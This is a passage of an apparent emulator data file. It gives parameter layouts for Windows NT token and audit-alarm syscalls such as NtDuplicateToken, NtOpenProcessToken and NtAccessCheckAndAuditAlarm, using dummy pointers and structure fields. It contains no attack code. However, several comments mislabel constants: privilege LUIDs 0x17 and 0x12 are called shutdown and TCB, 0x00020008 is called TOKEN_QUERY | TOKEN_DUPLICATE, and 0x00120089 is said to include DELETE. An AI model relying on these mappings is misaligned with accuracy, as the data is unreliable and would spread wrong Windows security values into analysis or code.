\"TOKEN_PRIMARY_GROUP\",\r\n \"structureRef\": \"struct237\",\r\n \"structureValueExpectations\": \"Primary group SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to TOKEN_OWNER (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_OWNER\",\r\n \"structureRef\": \"struct238\",\r\n \"structureValueExpectations\": \"Owner SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to TOKEN_PRIVILEGES (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_PRIVILEGES\",\r\n \"structureRef\": \"struct239\",\r\n \"structureValueExpectations\": \"Privileges for the token.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to TOKEN_GROUPS (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_GROUPS\",\r\n \"structureRef\": \"struct240\",\r\n \"structureValueExpectations\": \"Group SIDs for the token.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to TOKEN_USER (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_USER\",\r\n \"structureRef\": \"struct241\",\r\n \"structureValueExpectations\": \"User SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0110\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ExpirationTime (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct242\",\r\n \"structureValueExpectations\": \"Token expiration time.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0120\",\r\n \"additionalComment\": \"Pointer to LUID AuthenticationId (dummy pointer)\",\r\n \"structurePointer\": \"LUID\",\r\n \"structureRef\": \"struct243\",\r\n \"structureValueExpectations\": \"Authentication identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TokenType (TokenPrimary)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0130\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct244\",\r\n \"structureValueExpectations\": \"Token object attributes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F01FF\",\r\n \"additionalComment\": \"DesiredAccess (TOKEN_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0140\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct235\": {\r\n \"type\": \"TOKEN_SOURCE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"SourceName\",\r\n \"fieldType\": \"CHAR[8]\",\r\n \"fieldValue\": \"0x4c6f676f6e616d65\",\r\n \"fieldComment\": \"'Logoname' (example)\"\r\n },\r\n {\r\n \"fieldName\": \"SourceIdentifier.LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x12345678\",\r\n \"fieldComment\": \"Low part\"\r\n },\r\n {\r\n \"fieldName\": \"SourceIdentifier.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part\"\r\n }\r\n ]\r\n },\r\n \"struct236\": {\r\n \"type\": \"TOKEN_DEFAULT_DACL\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DefaultDacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0180\",\r\n \"fieldComment\": \"Pointer to ACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct237\": {\r\n \"type\": \"TOKEN_PRIMARY_GROUP\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrimaryGroup\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0190\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct238\": {\r\n \"type\": \"TOKEN_OWNER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd01a0\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct239\": {\r\n \"type\": \"TOKEN_PRIVILEGES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Two privileges\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"SE_SHUTDOWN_PRIVILEGE\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[1].Luid.LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000012\",\r\n \"fieldComment\": \"SE_TCB_PRIVILEGE\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[1].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[1].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct240\": {\r\n \"type\": \"TOKEN_GROUPS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GroupCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One group\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Sid\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd01b0\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"SE_GROUP_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct241\": {\r\n \"type\": \"TOKEN_USER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"User.Sid\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd01c0\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"User.Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"SE_GROUP_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct242\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x7fffffffffffffff\",\r\n \"fieldComment\": \"Maximum expiration time\"\r\n }\r\n ]\r\n },\r\n \"struct243\": {\r\n \"type\": \"LUID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000abcd\",\r\n \"fieldComment\": \"Low part of LUID\"\r\n },\r\n {\r\n \"fieldName\": \"HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part of LUID\"\r\n }\r\n ]\r\n },\r\n \"struct244\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDuplicateToken\": {\r\n \"ntFunc\": \"NtDuplicateToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE NewTokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TokenType = TokenPrimary\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"EffectiveOnly = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct245\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F01FF\",\r\n \"additionalComment\": \"DesiredAccess = TOKEN_ALL_ACCESS\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ExistingTokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct245\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no object name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenProcessToken\": {\r\n \"ntFunc\": \"NtOpenProcessToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00020008\",\r\n \"additionalComment\": \"DesiredAccess = TOKEN_QUERY | TOKEN_DUPLICATE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenThreadToken\": {\r\n \"ntFunc\": \"NtOpenThreadToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"OpenAsSelf = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020008\",\r\n \"additionalComment\": \"DesiredAccess = TOKEN_QUERY | TOKEN_DUPLICATE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationToken\": {\r\n \"ntFunc\": \"NtQueryInformationToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"TokenInformationLength = 32 bytes\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to TokenInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TokenInformationClass = TokenUser\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000666\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationToken\": {\r\n \"ntFunc\": \"NtSetInformationToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"TokenInformationLength = 32 bytes\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to TokenInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000006\",\r\n \"additionalComment\": \"TokenInformationClass = TokenGroups\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000666\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAccessCheckAndAuditAlarm\": {\r\n \"ntFunc\": \"NtAccessCheckAndAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to BOOLEAN GenerateOnClose (dummy pointer, will receive TRUE/FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG AccessStatus (dummy pointer, will receive access status)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG GrantedAccess (dummy pointer, will receive granted access mask)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ObjectCreation = FALSE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct246\",\r\n \"structureValueExpectations\": \"GENERIC_READ/WRITE/EXECUTE/ALL mappings.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct247\",\r\n \"structureValueExpectations\": \"Owner, group, DACL, SACL fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct248\",\r\n \"structureValueExpectations\": \"Object name string.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct249\",\r\n \"structureValueExpectations\": \"Object type name string.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct250\",\r\n \"structureValueExpectations\": \"Subsystem name string.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct246\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct247\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0130\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0140\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0150\",\r\n \"fieldComment\": \"Pointer to ACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct248\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"16 bytes (8 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0160\",\r\n \"fieldComment\": \"Pointer to object name string (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct249\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0012\",\r\n \"fieldComment\": \"18 bytes (9 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0170\",\r\n \"fieldComment\": \"Pointer to object type name string (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct250\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0180\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCloseObjectAuditAlarm\": {\r\n \"ntFunc\": \"NtCloseObjectAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"GenerateOnClose = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct251\",\r\n \"structureValueExpectations\": \"Subsystem name string.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct251\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0190\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeleteObjectAuditAlarm\": {\r\n \"ntFunc\": \"NtDeleteObjectAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"GenerateOnClose = FALSE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct252\",\r\n \"structureValueExpectations\": \"Subsystem name string.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct252\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd01a0\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenObjectAuditAlarm\": {\r\n \"ntFunc\": \"NtOpenObjectAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to BOOLEAN GenerateOnClose (dummy pointer, will 